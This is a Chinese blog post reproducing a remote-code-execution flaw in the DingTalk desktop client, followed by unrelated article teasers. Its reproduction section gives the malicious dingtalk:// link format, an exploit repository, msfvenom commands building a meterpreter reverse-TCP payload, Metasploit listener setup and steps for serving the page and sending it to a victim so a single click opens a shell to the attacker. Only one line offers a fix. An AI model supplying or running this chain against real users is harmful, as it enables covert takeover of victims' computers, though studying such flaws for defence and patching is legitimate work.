【漏洞复现】钉钉rce反弹shell

news/2024/11/15 0:59:38/

文章目录

  • 一、漏洞描述
  • 二、漏洞原理
  • 三、影响版本
  • 四、复现过程
    • 0.环境说明
    • 1.msf 生成shellcode
    • 2.msf开启监听
    • 3.将生成的shellcode替换原shellcode
    • 4.开启web服务,并上传poc文件,构造poc
    • 5.从钉钉发送poc给受害者
    • 6.受害者点击即会触发漏洞,在msf监听处上线。
  • 五、修复建议
    • 升级到最新版本


一、漏洞描述

钉钉具备获取查看web应用能力,且web站点通过http协议传输。基于payload可知,钉钉漏洞的利用就是通过HTTP协议进行访问构造的payload,从而达成远程RCE获取目标电脑权限。

钉钉6.3.5版本下载地址:
https://dtapp-pub.dingtalk.com/dingtalk-desktop/win_installer/Release/DingTalk_v6.3.5.11308701.exe项目地址:https://github.com/crazy0x70/dingtalk-RCE
poc:dingtalk://dingtalkclient/page/link?url=http://your_ip/dingding.html&pc_slide=true

二、漏洞原理

利用了Chromium v8引擎整数溢出漏洞(是V8优化编译器Turbofan在SimplifiedLowering阶段产生的一个整数溢出漏洞),V8是Chromium内核中的JavaScript引擎,负责对JavaScript代码进行解释优化与执行。

三、影响版本

钉钉版本< 6.3.25-Release.2149108

四、复现过程

0.环境说明

攻击机:192.168.37.129(Kali Linux)
目标机:192.168.37.131(windows7)

1.msf 生成shellcode

msfvenom的命令行选项:Options:-p, --payload    <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用&#039;-&#039;或者stdin指定-l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all-n, --nopsled    <length>        为payload预先指定一个NOP滑动长度-f, --format     <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)-e, --encoder    [encoder]       指定需要使用的encoder(编码器)-a, --arch       <architecture>  指定payload的目标架构--platform   <platform>      指定payload的目标平台-s, --space      <length>        设定有效攻击荷载的最大长度-b, --bad-chars  <list>          设定规避字符集,比如: &#039;\x00\xff&#039;-i, --iterations <count>         指定payload的编码次数-c, --add-code   <path>          指定一个附加的win32 shellcode文件-x, --template   <path>          指定一个自定义的可执行文件作为模板-k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行--payload-options            列举payload的标准选项-o, --out   <path>               保存payload-v, --var-name <name>            指定一个自定义的变量,以确定输出格式--shellest                   最小化生成payload-h, --help                       查看帮助选项--help-formats               查看msf支持的输出格式列表
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机ip LPORT=端口 -e x86/culprit -f csharpmsfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.37.129 LPORT=8834 -e x86/culprit -f csharp

image.png

2.msf开启监听

LHOST为攻击机IP,LPORT为刚才生成木马的端口

use exploit/multi/handler
set LHOST 192.168.37.129
set LPORT 8834
set payload windows/meterpreter/reverse_tcp
run

image.png
image.png

3.将生成的shellcode替换原shellcode

需要替换的位置为
var shellcode=new Uint8Array()
以后的部分

image.png

4.开启web服务,并上传poc文件,构造poc

python -m http.server 端口

image.png

5.从钉钉发送poc给受害者

image.png

6.受害者点击即会触发漏洞,在msf监听处上线。

image.png

五、修复建议

升级到最新版本


http://www.ppmy.cn/news/9458.html

相关文章

⚡️【linux】linux编辑器-VIM的高频使用,快快收藏起来!

⚡️目录 1️⃣VIM最小集 2️⃣VIM指令集 3️⃣VIM的配置 &#x1f332;前言&#xff1a;VIM和VI的区别简单点来讲&#xff0c;他们都是多模式编辑器&#xff0c;不同的是VIM是VI的升级版本&#xff0c;它不仅兼容VI的所有指令&#xff0c;而且还有一些新的特征在里面。例如语…

前端基础_离线Web应用概述

离线Web应用概述在Web应用中使用缓存的原因之一是为了支持离线应用。在全球互联的时代&#xff0c;离线应用仍有其实用价值。当无法上网的时候&#xff0c;你会做什么呢&#xff1f;你可能会说如今网络无处不在&#xff0c;而且非常稳定&#xff0c;不存在没有网络的情况。但事…

编写 MBR 主引导记录

文章目录前言mbs.S代码实验操作前言 本博客记录《操作系统真象还原》第二章最后一节的实验操作~ 实验需要安装Bochs软件&#xff0c;具体可食用Bochs下载安装博客。 实验环境&#xff1a;ubuntu18.04VMware 实验内容&#xff1a;在屏幕上打印字符串“1 MBR”&#xff0c;背…

人工智能期末试卷

一、简答题&#xff08;共 24 分&#xff09; 若将人看成一个信息处理系统&#xff0c;1) 人的智能具有哪些特征&#xff1f;2) 举例说明哪一特征是最重要的并 3) 阐述其与实现通用人工智能的关系。(要求&#xff1a;2、3 小问一定用自己的语言作答&#xff01;)&#xff08;8 …

vue3学习记录二组件之间的通信方式-下

三 defineProps和defineEmits - defineProps 和 defineEmits 都是只能在 <script setup> 中使用的编译器宏。 - 不需要导入 - defineProps 接收与 props 选项相同的值&#xff0c;defineEmits 接收与 emits 选项相同的值。 - defineProps 和 defineEmits 在选项传入后&a…

什么是密码管理器?它安全吗?

密码管理器或密钥管理员是一类用于生成、检索、保存及管理复杂密码、数字签名的措施&#xff0c;可以由硬件或软件实现。因此&#xff0c;密码管理器一般也称作密码管理软件。复杂密码的生成一般按需要以随机算法产生&#xff0c;而密码数据则保存于一个以密码、数字签名等方式…

代码随想录拓展day7 649. Dota2 参议院;1221. 分割平衡字符串;5.最长回文子串;132. 分割回文串 II;673.最长递增子序列的个数

代码随想录拓展day7 649. Dota2 参议院&#xff1b;1221. 分割平衡字符串&#xff1b;5.最长回文子串&#xff1b;132. 分割回文串 II&#xff1b;673.最长递增子序列的个数 贪心和动态规划的题目。因为贪心其实没什么规律&#xff0c;所以就简要记录了。 649. Dota2 参议院 …

基于Vue和SpringBoot的宾馆管理系统的设计和实现

作者主页&#xff1a;Designer 小郑 作者简介&#xff1a;Java全栈软件工程师一枚&#xff0c;来自浙江宁波&#xff0c;负责开发管理公司OA项目&#xff0c;专注软件前后端开发&#xff08;Vue、SpringBoot和微信小程序&#xff09;、系统定制、远程技术指导。CSDN学院、蓝桥云…